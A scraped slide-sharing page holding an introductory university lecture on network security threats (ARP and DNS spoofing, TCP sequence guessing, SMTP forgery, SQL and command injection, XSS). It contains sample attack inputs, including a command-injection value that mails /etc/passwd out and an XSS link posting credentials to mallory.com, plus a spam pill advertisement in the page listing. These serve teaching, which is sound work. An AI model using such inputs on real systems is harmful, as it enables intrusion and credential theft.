membuat desain sistem keamanan jaringanmembuat desain sistem keamanan jaringan
membuat desain sistem keamanan jaringan
 
mengadministrasi server dalam jaringan
mengadministrasi server dalam jaringanmengadministrasi server dalam jaringan
mengadministrasi server dalam jaringan
 

Recently uploaded

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vĂĄzquez
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel AraĂșjo
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 

Recently uploaded (20)

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 

security

  • 1. Pertemuan - 12 Introduction to Security Jaringan Komputer Teknik Informatika Universitas Yudharta Pasuruan 2012 © Levente ButtyĂĄn MOCHAMAD SIRODJUDIN, S.Kom, MM www.sirodjudin.com
  • 2. Outline  TCP/IP networking overview  protocols and known vulnerabilities – – – – – – ARP / ARP spoofing IP / eavesdropping, alteration, traffic analysis, etc. TCP / SYN attack Telnet, FTP / password sniffing SMTP / e-mail forgery, eavesdropping, alteration DNS / DNS spoofing  more known security problems – – – – Web forms, cookies, and CGI scripts mobile code (Java scripts, Java applets, and ActiveX controls) denial of service (DoS) exploiting bugs in software (buffer overflow problems)  outline of the course © Levente ButtyĂĄn 2
  • 3. TCP/IP layering HTTP application 
 FTP DNS SMTP 
 SNMP transport UDP TCP/IP networking overview TCP network IGMP ICMP IP ARP hardware interface media © Levente ButtyĂĄn link RARP 3
  • 4. An example end system end system HTTP client HTTP server HTTP TCP TCP TCP TCP/IP networking overview router IP Ethernet driver IP Ethernet protocol Ethernet © Levente ButtyĂĄn IP IP Ethernet driver token ring driver token ring protocol IP token ring driver token ring 4
  • 5. Encapsulation user data HTTP client HTTP hdr TCP TCP hdr TCP/IP networking overview IP IP hdr Ethernet driver Eth. hdr tr. Ethernet © Levente ButtyĂĄn 5
  • 6. Demultiplexing HTTP FTP 
 DNS SNMP SMTP TCP TCP/IP networking overview 
 UDP IGMP ICMP IP demuxing based on the port number in the TCP or UDP header demuxing based on the protocol id in the IP header RARP ARP Ethernet driver © Levente ButtyĂĄn demuxing based on frame type in the Ethernet header 6
  • 7. Names and addresses  IP addresses TCP/IP networking overview – every interface has a unique IP address – 32 bits long, usually given in dotted decimal notation – 5 classes: ‱ ‱ ‱ ‱ ‱ class A: “0” + 7 bits net ID + 24 bits host ID class B: “10” + 14 bits net ID + 16 bits host ID class C: “110” + 21 bits net ID + 8 bits host ID class D: “1110” + 28 bits multicast group ID class E: starts with “11110”, reserved for future use – subnet addressing (CIDR - classless Internet domain routing) ‱ host ID portion is divided into a subnet ID and a host ID ‱ e.g., class B address: “10” + 14 bit net ID + 8 bit subnet ID + 8 bit host ID hierarchical addressing © Levente ButtyĂĄn 7
  • 8. Names and addresses  hardware address (MAC addresses) TCP/IP networking overview – – – – every interface has a unique and fixed hardware address too it is used by the data link layer in case of Ethernet, it is 48 bits long mapping between IP addresses and MAC addresses are done by ARP  host names – human readable, hierarchical names, such as www.hit.bme.hu – every host may have several names – mapping between names and IP addresses is done by the Domain Name System (DNS) © Levente ButtyĂĄn 8
  • 9. ARP – Address Resolution Protocol  mapping from IP addresses to MAC addresses Request .1 08:00:20:03:F6:42 .2 .3 .4 00:00:C0:C2:9B:26 .5 140.252.13 Protocols and vulnerabilities arp req | target IP: 140.252.13.5 | target eth: ? Reply .1 08:00:20:03:F6:42 .2 .3 .4 00:00:C0:C2:9B:26 .5 140.252.13 arp rep | sender IP: 140.252.13.5 | sender eth: 00:00:C0:C2:9B:26 © Levente ButtyĂĄn 9
  • 10. ARP spoofing  an ARP request can be responded by another host Request .1 08:00:20:03:F6:42 .2 .3 .4 00:00:C0:C2:9B:26 .5 140.252.13 Protocols and vulnerabilities arp req | target IP: 140.252.13.5 | target eth: ? Reply .1 08:00:20:03:F6:42 .2 .3 00:34:CD:C2:9F:A0 00:00:C0:C2:9B:26 .4 .5 140.252.13 arp rep | sender IP: 140.252.13.5 | sender eth: 00:34:CD:C2:9F:A0 © Levente ButtyĂĄn 10
  • 11. Protocols and vulnerabilities IP – Internet Protocol  provides an unreliable, connectionless datagram delivery service to the upper layers  its main function is routing  it is implemented in both end systems and intermediate systems (routers)  routers maintain routing tables that define the next hop router towards a given destination (host or network)  IP routing uses the routing table and the information in the IP header (e.g., the destination IP address) to route a packet © Levente ButtyĂĄn 11
  • 12. IP security problems  user data in IP packets is not protected in any way – anyone who has access to a router can read and modify the user data in the packets  IP packets are not authenticated – it is fairly easy to generate an IP packet with an arbitrary source IP address Protocols and vulnerabilities  traffic analysis – even if user data was encrypted, one could easily determine who is communicating with whom by just observing the addressing information in the IP headers  information exchanged between routers to maintain their routing tables is not authenticated – – – – correct routing table updates can be modified or fake ones can be disseminated this may screw up routing completely leading to loops or partitions it may also facilitate eavesdropping, modification, and monitoring of traffic it may cause congestion of links or routers (i.e., denial of service) © Levente ButtyĂĄn 12
  • 13. TCP – Transmission Control Protocol  provides a connection oriented, reliable, byte stream service to the upper layers  connection oriented: Protocols and vulnerabilities – connection establishment phase prior to data transfer – state information (sequence numbers, window size, etc.) is maintained at both ends  reliable: – positive acknowledgement scheme (unacknowledged bytes are retransmitted after a timeout) – checksum on both header and data – reordering of segments that are out of order – detection of duplicate segments – flow control (sliding window mechanism) © Levente ButtyĂĄn 13
  • 14. TCP connection establishment 3 way handshake client SYN = ISNC SYN = ISNS, ACK(ISNC) server ISN – Initial Sequence Number ACK(ISNS) Protocols and vulnerabilities data transfer – sequence numbers are 32 bits long – the sequence number in a data segment identifies the first byte in the segment – sequence numbers are initialized with a “random” value during connection setup – the RFC suggests that the ISN is incremented by one at least every 4 ms © Levente ButtyĂĄn 14
  • 15. TCP SYN attack  in Berkeley implementations, the ISN is incremented by a constant amount (64000) – once per 0.5 second, and – each time a connection is initiated Protocols and vulnerabilities  it is not hopeless to guess the next ISN to be used by a server  an attacker can impersonate a trusted host (e.g., in case of r commands, authentication is based on source IP address solely) attacker SYN = ISNX, SRC_IP = T server trusted host (T) SYN = ISNS, ACK(ISNX) ACK(ISNS), SRC_IP = T SRC_IP = T, nasty_data © Levente ButtyĂĄn 15
  • 16. TCP SYN attack – How to guess ISNS? attacker server Protocols and vulnerabilities Dt – – – – – – ISNS‟ depends on ISNS and Dt Dt can be estimated from the round trip time assume Dt can be estimated with 10 ms precision the attacker has an uncertainty of 1280 in the possible value for ISNS‟ assume each trial takes 5 s the attacker has a reasonable likelihood of succeeding in 6400 s and a near-certainty within one day © Levente ButtyĂĄn 16
  • 17. FTP – File Transfer Protocol client user interface user server Protocols and vulnerabilities protocol interpreter data transfer function file system © Levente ButtyĂĄn control connection (FTP commands and replies) protocol interpreter data connection data transfer function file system 17
  • 18. FTP cont‟d  typical FTP commands: – – – – – RETR filename – retrieve (get) a file from the server STOR filename – store (put) a file on the server TYPE type – specify file type (e.g., A for ASCII) USER username – username on server PASS password – password on server  FTP is a text (ASCII) based protocol server Protocols and vulnerabilities client % ftp ftp.epfl.ch <TCP connection setup to port 21 of ftp.epfl.ch> “220 ftp.epfl.ch FTP server (version 5.60) ready.” Connected to ftp.epfl.ch. Name: buttyan “USER buttyan” “331 Password required for user buttyan.” Password: kiskacsa “PASS kiskacsa” “230 User buttyan logged in.” 
 © Levente ButtyĂĄn 18
  • 19. Telnet Protocols and vulnerabilities  provides remote login service to users  works between hosts that use different operating systems  uses option negotiation between client and server to determine what features are supported by both ends Telnet client kernel Telnet server login shell kernel terminal driver TCP/IP TCP/IP pseudoterminal driver TCP connection user © Levente ButtyĂĄn 19
  • 20. Telnet cont‟d  Telnet session example (“character at a time” mode) server client % telnet ahost.epfl.ch Connected to ahost.epfl.ch. Escape character is „^]‟. <TCP connection setup to port 23 of ahost.epfl.ch> <Telnet option negotiation> “UNIX(r) System V Release 4.0” “Login:” Protocols and vulnerabilities Login: b “b” Login: bu “u” 
 Login: buttyan “n” “Password:” Password: k “k” 
 Password: kiskacsa “a” <OS greetings and shell prompt, e.g., “%”> © Levente ButtyĂĄn 
 20
  • 21. SMTP – Simple Mail Transfer Protocol sending host user agent mails to be sent user local MTA SMTP relay MTA TCP connection SMTP Protocols and vulnerabilities TCP port 25 relay MTA SMTP receiving host local MTA user agent user © Levente ButtyĂĄn SMTP relay MTA user mailbox 21
  • 22. SMTP cont‟d  SMTP is used by MTAs to talk to each other  SMTP is a text (ASCII) based protocol sending MTA (rivest.hit.bme.hu) receiving MTA (shamir.hit.bme.hu) <TCP connection establishment to port 25> “HELO rivest.hit.bme.hu.” “250 shamir.hit.bme.hu Hello rivest.hit.bme.hu., pleased to meet you” Protocols and vulnerabilities “MAIL from: buttyan@rivest.hit.bme.hu” “250 buttyan@rivest.hit.bme.hu... Sender ok” “RCPT to: hubaux@lca.epfl.ch” “250 hubaux@lca.epfl.ch
 Recipient ok” “DATA” “354 Enter mail, end with a “.” on a line by itself” <message to be sent> . “250 Mail accepted” “QUIT” “221 shamir.hit.bme.hu delivering mail” © Levente ButtyĂĄn 22
  • 23. SMTP security problems  SMTP does not provide any protection of e-mail messages – messages can be read and modified by any of the MTAs involved – fake messages can easily be generated (e-mail forgery) Protocols and vulnerabilities  Example: % telnet frogstar.hit.bme.hu 25 Trying... Connected to frogstar.hit.bme.hu. Escape character is ‘^[’. 220 frogstar.hit.bme.hu ESMTP Sendmail 8.11.6/8.11.6; Mon, 10 Feb 2003 14:23:21 +0100 helo abcd.bme.hu 250 frogstar.hit.bme.hu Hello [152.66.249.32], pleased to meet you mail from: bill.gates@microsoft.com 250 2.1.0 bill.gates@microsoft.com... Sender ok rcpt to: buttyan@ebizlab.hit.bme.hu 250 2.1.5 buttyan@ebizlab.hit.bme.hu... Recipient ok data 354 Enter mail, end with "." on a line by itself Your fake message goes here. . 250 2.0.0 h1ADO5e21330 Message accepted for delivery quit 221 frogstar.hit.bme.hu closing connection Connection closed by foreign host. % © Levente ButtyĂĄn 23
  • 24. Protocols and vulnerabilities Be careful, though! Return-Path: <bill.gates@microsoft.com> Received: from frogstar.hit.bme.hu (root@frogstar.hit.bme.hu [152.66.248.44]) by shamir.ebizlab.hit.bme.hu (8.12.7/8.12.7/Debian-2) with ESMTP id h1ADSsxG022719 for <buttyan@ebizlab.hit.bme.hu>; Mon, 10 Feb 2003 14:28:54 +0100 Received: from abcd.bme.hu ([152.66.249.32]) by frogstar.hit.bme.hu (8.11.6/8.11.6) with SMTP id h1ADO5e21330 for buttyan@ebizlab.hit.bme.hu; Mon, 10 Feb 2003 14:25:41 +0100 Date: Mon, 10 Feb 2003 14:25:41 +0100 From: bill.gates@microsoft.com Message-Id: <200302101325.h1ADO5e21330@frogstar.hit.bme.hu> To: undisclosed-recipients:; X-Virus-Scanned: by amavis-dc Status: Your fake message goes here. © Levente ButtyĂĄn 24
  • 25. DNS – Domain Name System Protocols and vulnerabilities  The DNS is a distributed database that provides mapping between hostnames and IP addresses  the DNS name space is hierarchical – top level domains: com, edu, gov, int, mil, net, org, ae, 
, hu, 
 zw – top level domains may contain second level domains e.g., bme within hu, epfl within ch, 
 – second level domains may contain third level domains, etc.  each domain has name servers – usually (not always) a name server knows the IP address of the top level name servers – if a domain contains sub-domains, then the name server knows the IP address of the sub-domain name servers – when a new host is added to a domain, the administrator adds the (hostname, IP address) mapping to the database of the local name server © Levente ButtyĂĄn 25
  • 26. DNS cont‟d frogstar.hit.bme.hu = ? application 152.66.248.44 local name srv frogstar.hit.bme.hu = ? IP of ns in hu top level name srv name srv in hu Protocols and vulnerabilities name srv in bme.hu name srv in hit.bme.hu – a single DNS reply may include several (hostname, IP address) mappings (Resource Records) – received information is cached by the name server © Levente ButtyĂĄn 26
  • 27. DNS spoofing  the cache of a DNS name server is poisoned with false information  how to do it? Protocols and vulnerabilities – assume that the attacker wants www.anything.hu to map to his own IP address 152.66.249.32 – approach 1: ‱ attacker submits a DNS query “www.anything.hu=?” to ns.victim.hu ‱ a bit later it forges a DNS reply “www.anything.hu=152.66.249.32” ‱ UDP makes forging easier but the attacker must still predict the query ID – approach 2 (attacker has access to ns.attacker.hu): ‱ the attacker modifies its local name server such that it responds a query “www.attacker.hu=?” with “www.anything.hu=152.66.249.32” ‱ the attacker then submits a query “www.attacker.hu=?” to ns.victim.hu ‱ ns.victim.hu sends the query “www.attacker.hu=?” to ns.attacker.hu ‱ ns.attacker.hu responds with “www.anything.hu=152.66.249.32” © Levente ButtyĂĄn 27
  • 28. Web security – Browser side risks  obtaining a valid browser – IE usually comes with the OS – Netscape can be obtained from web sites – How can you be sure that you are downloading a genuine copy? (remember DNS spoofing) – a fake browser can look like a genuine one, but it can Web security problems ‱ obtain and send passwords typed in by the user ‱ downgrade browser security (e.g., reduce key length used in SSL) ‱ 
  web forms – used to send data from the user to the server (e.g., online applications, queries to a database, etc.) – if pure HTTP is used, then the data is sent in clear – sensitive information can be eavesdropped and/or modified © Levente ButtyĂĄn 28
  • 29. Browser side risks cont‟d  helper applications – the browser cannot handle all kind of downloaded data – it invokes an external program (the helper) on the user‟s machine with the downloaded data as parameter – e.g., to display a PostScript file, it may pass it to GhostView – downloaded content can be dangerous (e.g., MS Word and Excel files may contain macro viruses) Web security problems  mobile code – Java applets ‱ normally run within a controlled environment (sandbox) ‱ access to local resources is strictly controlled by a security manager ‱ however, an applet may escape from the sandbox due to some bugs in the implementation of the Java Virtual Machine ‱ several such bugs have been discovered, reported, and fixed ‱ what guarantees that there‟s no more? © Levente ButtyĂĄn 29
  • 30. Browser side risks cont‟d  mobile code (cont‟d) – ActiveX controls ‱ a Microsoft approach to mobile code ‱ ActiveX controls are executables that run directly on the machine (there‟s no sandbox) ‱ ActiveX controls can be signed and declared safe by their creators ‱ but an ActiveX control declared safe may turn out to be dangerous Web security problems – Compaq signed a control safe which allowed for remote management of servers – Microsoft signed a control which could write arbitrary file on the hard disk (it was exploited by a virus Kak.Worm) – JavaScript != Java applet ‱ scripts are interpreted by the browser itself ‱ not as powerful as Java (e.g., many attacks require that the user clicks on a button to activate the malicious code) ‱ successful attacks reported include history tracking, stealing files, helping Java applets to bypass firewalls, etc. © Levente ButtyĂĄn 30
  • 31. Browser side risks cont‟d  cookies Web security problems – a cookie is a (name, value) pair – cookies are set by web servers and stored by web browsers – a cookie set by a server is sent back to the server when the browser visits the server again – used to create “HTTP sessions” (session state information is stored in cookies) – example: client server get index.html content of index.html + set-cookie: sessionID=123456789 get nextlink.html + cookie: sessionID=123456789 
 © Levente ButtyĂĄn 31
  • 32. Browser side risks cont‟d  cookies (cont‟d) – if cookies are sent in clear, then they can be eavesdropped and used to hijack an “HTTP session” – cookies can be used to track what sites the user visits (can lead to serious privacy violation!) Web security problems ‱ many sites use third party advertisements ‱ the third party can set a cookie that identifies the user ‱ this cookie is sent to the third party each time an ad is downloaded by the user‟s browser along with the address of the page that contains the link to the ad (the “referrer” field of the HTTP header contains this address) whatever.com index.html browser get ad_server.asp + referrer=“whatever.com/index.html” + cookie: user=123456789 © Levente ButtyĂĄn <html> 
 <img src=“http://thirdparty.com/ad_server.asp”> 
 </html> thirdparty.com 32
  • 33. Browser side risks cont‟d  http://www.musicvision.com/network_privacy_policy.html Web security problems Third Party Advertising We use Maxworldwide and other third-party advertising companies to serve ads when you visit our Web site. These companies may use information (not including your name, address, email address or telephone number) about your visits to this and other Web sites in order to provide advertisements on this site and other sites about goods and services that may be of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, please click here Third Party Cookies In the course of serving advertisements to this site, our third-party advertiser may place or recognize a unique "cookie" on your browser. © Levente ButtyĂĄn 33
  • 34. Web security – Server side risks  interactive web sites are based on forms and scripts Web security problems – forms are written in html – the user fills the form and clicks on a button to submit it – this creates a request to the server that contains the data typed in by the user – the request launches a script on the server that processes the data supplied by the user (may return a page that is created using the supplied data)  unexpected user input may have unexpected effects – special characters – too much data (may cause buffer overflow)  at best, the server crashes  at worst, the attacker gains control over the server © Levente ButtyĂĄn 34
  • 35. Server side risks cont‟d  an example: password based user authentication – assume the following server side script is used to check the supplied username and password: query$ = „SELECT name, pass FROM database WHERE name = “ ‟ + name$ + „ ” AND pass = “ ‟ + pass$ + „ ” ‟ Result = SQLquery(query$) if Result <> 0 then OK – with name$ = buttyan and pass$ = kiskacsa Web security problems SELECT name, pass FROM database WHERE name = “buttyan” AND pass = “kiskacsa” – with name$ = buttyan” OR TRUE OR name = “ and pass$ = kiskacsa SELECT name, pass FROM database WHERE name = “buttyan” OR TRUE OR name = “” AND pass = “kiskacsa” © Levente ButtyĂĄn 35
  • 36. Server side risks cont‟d  another example: the user can type her e-mail address in a form and the server sends her the latest public company report – assume the following perl script is used on the server system(“sendmail $address < report.doc”); – with $address = buttyan@hit.bme.hu system(“sendmail buttyan@hit.bme.hu < report.doc”); Web security problems – with $address = buttyan@hit.bme.hu < /etc/passwd | sendmail buttyan@hit.bme.hu system(“sendmail buttyan@hit.bme.hu < /etc/passwd | sendmail buttyan@hit.bme.hu < report.doc”); © Levente ButtyĂĄn 36
  • 37. Server side risks cont‟d  Buffer overflow attacks – if the program doesn‟t verify that the supplied data fits in the allocated space, then it may overwrite some parts of the memory, which may contain data, instructions, or addresses – by carefully analyzing the program structure one can provide machine code as part of the supplied data that will be executed by the server – many attacks use buffer overflow bugs (e.g., infamous Internet Worm by Morris used a buffer overflow bug in the sendmail program) Web security problems  Format string attack – printf(“%s”, str); -- correct. – printf(str); -- will compile, but dangerous! ‱ str will be interpreted as a format string © Levente ButtyĂĄn 37
  • 38. Cross site scripting  the attacker arranges that the victim receives a malicious script from a trusted server  example: Web security problems – Mallory places the script in the “guest book” of Bob – Alice visits the “guest book” of Bob – her browser downloads and runs Mallory‟s script © Levente ButtyĂĄn 38
  • 39. CSS cont‟d  another example – when requesting a non-existent file abcd.html from some web servers, they return error messages like: “The requested file abcd.html cannot be found on the server.” Web security problems – Mallory can place the following link on a page: < a href=“http://trusted.server.com/is protected. The server needs you to login.<br><form action=&#34;http://mallory.com/cgiscript.cgi&#34; method=&#34;post&#34;>Username: <input type=&#34;text&#34; name=&#34;name&#34;><br>Password: <input type=&#34;password&#34; name=&#34;pass&#34;><br><input type=&#34;submit&#34; value=&#34;Login&#34;></form><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>”> – what will happen? ‱ Alice clicks on the link ‱ HTTP request is sent to trusted.server.com ‱ the server returns the usual error page, but it will look like a login window... © Levente ButtyĂĄn 39
  • 40. CSS cont‟d The requested file is protected. The server needs you to log in. Username: Password: Web security problems Login browser window cannot be found on the server. © Levente ButtyĂĄn 40
  • 41. Conclusion  there are many more vulnerabilities and attacks Auto Coordinated © 2002 by Carnegie Mellon University http://www.cert.org/archive/ppt/cyberterror.ppt Cross site scripting “stealth” / advanced scanning techniques High packet spoofing sniffers Intruder Knowledge sweepers Tools Staged distributed www attack tools attacks automated probes/scans denial of service GUI back doors disabling audits network mgmt. diagnostics hijacking burglaries sessions exploiting known vulnerabilities Attack Sophistication password cracking self-replicating code Intruders password guessing Low 1980 1985 1990 1995 2000  some of these cannot be prevented by technical means, but only with careful procedures and education of people  this course will focus on technical countermeasures © Levente ButtyĂĄn 41
  • 42. Course outline              brief introduction to cryptography e-mail security: PGP, S/MIME secure remote access: SSH the Secure Socket Layer (SSL) network layer security: IPSec (AH, ESP, IKE) link layer security: L2TP e-commerce security: SET, e-cash, micropayments privacy protection: Onion routing, Crowds Java security DNS security firewalls and intrusion detection systems Wi-Fi security (IEEE 802.11 wireless LAN) peer-to-peer security © Levente ButtyĂĄn 42